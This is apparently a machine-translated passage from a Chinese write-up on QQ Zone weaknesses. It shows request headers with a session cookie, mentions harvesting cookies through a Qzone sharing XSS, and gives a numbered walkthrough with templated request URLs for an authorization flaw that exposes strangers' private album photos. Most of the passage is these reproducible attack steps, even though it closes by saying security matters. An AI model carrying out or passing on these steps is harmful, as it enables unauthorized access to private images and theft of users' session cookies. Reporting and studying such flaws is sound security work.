Cookie: skey=@njGHHthuc; uin=o126******2;
接受:图片/jpeg,*/*
参考:qzone.qq.com
接受语言:en-us
用户代理:Mozilla/4.0(兼容;MSIE 6.0;Windows NT 5.0)
主机:qz.qq.com
缓存控制:无缓存
如果一切顺利,我们将拥有我们想要的页面。
使用方法:获取cookie中的SKEY
这主要是为了使用XSS,见:分享到Qzone XSS获取大量cookies。当然,这并没有什么效果,但你可以以此作为一种思考方式。
思考 2:利用漏洞
为了保证安全,QQ空间中的各个模块都要验证用户的登录状态,但是可能是因为程序员在写的时候忘记了这一点,没有验证,导致用户信息泄露。
见:QQ空间可以未经授权查看陌生人相册图片(高清)
1.默认无法访问陌生人的空间和相册
2.进入自己的空间,在所有动态位置,如果有好友动态,点击查看网络请求,有如下界面:
***(自己的QQ,需要一直登录)&visiteduin=***(经测试可以是陌生人的QQ)&count=10&alpha=1&useutf8=1&g_tk=***
3.解析2得到的json得到topicid和pickey
4.在QQ空间或者所有动态位置,如果有朋友发了图片,点击查看图片和监控界面:
***&callback=viewer_Callback&t=202307701&topicId=***&picKey=***&shootTime=&cmtOrder=1&fupdate=1&cmtNum=10&likeNum=5&inCharset=utf-8&outCharset=utf-8&callbackFun=viewer&offset=0&number=20&uin=***&appid =4&isFirst=1&hostUin=***(给想看QQ的人)&showMode=1&prevNum=9&postNum=18&_=1388730579218"
将***替换为3得到的内容,即可获取相册图片列表。
估计步骤2的内容是由另一个模块生成的。在本模块中已经进行了权限判断,没有权限的将不会生成。因此,步骤4中的URL没有权限判断。表面上没有问题,但是当你自己构造一个特殊的请求时,你可以访问其他内容。
----------------------------------- ---------- ---------------------------------
感谢您为我们提供了一个免费的知识共享平台,虽然不是太平等。
信息安全很重要。
